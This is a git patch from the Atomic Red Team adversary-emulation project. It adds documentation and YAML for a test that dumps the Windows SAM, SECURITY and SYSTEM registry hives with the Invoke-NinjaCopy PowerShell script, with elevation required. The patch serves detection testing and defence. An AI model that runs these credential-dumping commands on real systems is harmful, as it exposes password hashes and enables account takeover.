From cfa6ae33fc19662469619db8112e0c8bf07e0712 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Mon, 23 Dec 2019 15:55:40 +0000 Subject: [PATCH] Generate docs from job=validate_atomics_generate_docs branch=master --- atomics/T1003/T1003.md | 36 ++++++++++++++++++++++++++++++++++++ atomics/index.md | 1 + atomics/index.yaml | 35 +++++++++++++++++++++++++++++++++++ atomics/windows-index.md | 1 + 4 files changed, 73 insertions(+) diff --git a/atomics/T1003/T1003.md b/atomics/T1003/T1003.md index 8a74165a..3e6102f2 100644 --- a/atomics/T1003/T1003.md +++ b/atomics/T1003/T1003.md @@ -159,6 +159,8 @@ The /proc filesystem on Linux contains a great deal of information regarding the - [Atomic Test #12 - GPP Passwords (Get-GPPPassword)](#atomic-test-12---gpp-passwords-get-gpppassword) +- [Atomic Test #13 - Dump SAM, SECURITY and SYSTEM files using NinjaCopy PowerShell script](#atomic-test-13---dump-sam-security-and-system-files-using-ninjacopy-powershell-script) +
@@ -429,4 +431,38 @@ Get-GPPPassword -Verbose +
+
+ +## Atomic Test #13 - Dump SAM, SECURITY and SYSTEM files using NinjaCopy PowerShell script +This test uses PowerShell to copy SAM, SECURITY and SYSTEM files from an NTFS partitioned volume by reading the raw volume and parsing the NTFS structures. +Credit to Joe Bialek (https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-NinjaCopy.ps1) + +**Supported Platforms:** Windows + + +#### Inputs +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| sam_binary_path | Path of the SAM file | string | C:\Windows\System32\config\sam| +| system_binary_path | Path of the SYSTEM file | string | C:\Windows\System32\config\system| +| security_binary_path | Path of the SECURITY file | string | C:\Windows\System32\config\security| +| output_folder | Output folder path | Path | C:\Windows\Temp| + +#### Run it with `powershell`! Elevation Required (e.g. root or admin) +``` +. $PathToAtomicsFolder\T1003\src\Invoke-NinjaCopy.ps1 +Invoke-NinjaCopy -Path "#{sam_binary_path}" -LocalDestination "#{output_folder}\sam" +Invoke-NinjaCopy -Path "#{system_binary_path}" -LocalDestination "#{output_folder}\system" +Invoke-NinjaCopy -Path "#{security_binary_path}" -LocalDestination "#{output_folder}\security" +``` + + +#### Cleanup Commands: +``` +rm "#{output_folder}\sam" +rm "#{output_folder}\system" +rm "#{output_folder}\security" +``` +
diff --git a/atomics/index.md b/atomics/index.md index 673ed1aa..243dfd76 100644 --- a/atomics/index.md +++ b/atomics/index.md @@ -662,6 +662,7 @@ - Atomic Test #10: Copy NTDS.dit from Volume Shadow Copy [windows] - Atomic Test #11: GPP Passwords (findstr) [windows] - Atomic Test #12: GPP Passwords (Get-GPPPassword) [windows] + - Atomic Test #13: Dump SAM, SECURITY and SYSTEM files using NinjaCopy PowerShell script [windows] - T1503 Credentials from Web Browsers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1081 Credentials in Files](./T1081/T1081.md) - Atomic Test #1: Extract Browser and System credentials with LaZagne [macos] diff --git a/atomics/index.yaml b/atomics/index.yaml index 7aa4e19b..f042ecfd 100644 --- a/atomics/index.yaml +++ b/atomics/index.yaml @@ -19627,6 +19627,41 @@ credential-access: command: | . #{gpp_script_path} Get-GPPPassword -Verbose + - name: Dump SAM, SECURITY and SYSTEM files using NinjaCopy PowerShell script + description: | + This test uses PowerShell to copy SAM, SECURITY and SYSTEM files from an NTFS partitioned volume by reading the raw volume and parsing the NTFS structures. + Credit to Joe Bialek (https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-NinjaCopy.ps1) + supported_platforms: + - windows + input_arguments: + sam_binary_path: + description: Path of the SAM file + type: string + default: C:\Windows\System32\config\sam + system_binary_path: + description: Path of the SYSTEM file + type: string + default: C:\Windows\System32\config\system + security_binary_path: + description: Path of the SECURITY file + type: string + default: C:\Windows\System32\config\security + output_folder: + description: Output folder path + type: Path + default: C:\Windows\Temp + executor: + name: powershell + elevation_required: true + command: | + . $PathToAtomicsFolder\T1003\src\Invoke-NinjaCopy.ps1 + Invoke-NinjaCopy -Path "#{sam_binary_path}" -LocalDestination "#{output_folder}\sam" + Invoke-NinjaCopy -Path "#{system_binary_path}" -LocalDestination "#{output_folder}\system" + Invoke-NinjaCopy -Path "#{security_binary_path}" -LocalDestination "#{output_folder}\security" + cleanup_command: |- + rm "#{output_folder}\sam" + rm "#{output_folder}\system" + rm "#{output_folder}\security" T1081: technique: x_mitre_permissions_required: diff --git a/atomics/windows-index.md b/atomics/windows-index.md index 572c6967..97f85256 100644 --- a/atomics/windows-index.md +++ b/atomics/windows-index.md @@ -476,6 +476,7 @@ - Atomic Test #10: Copy NTDS.dit from Volume Shadow Copy [windows] - Atomic Test #11: GPP Passwords (findstr) [windows] - Atomic Test #12: GPP Passwords (Get-GPPPassword) [windows] + - Atomic Test #13: Dump SAM, SECURITY and SYSTEM files using NinjaCopy PowerShell script [windows] - T1503 Credentials from Web Browsers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1081 Credentials in Files](./T1081/T1081.md) - Atomic Test #3: Extracting passwords with findstr [windows]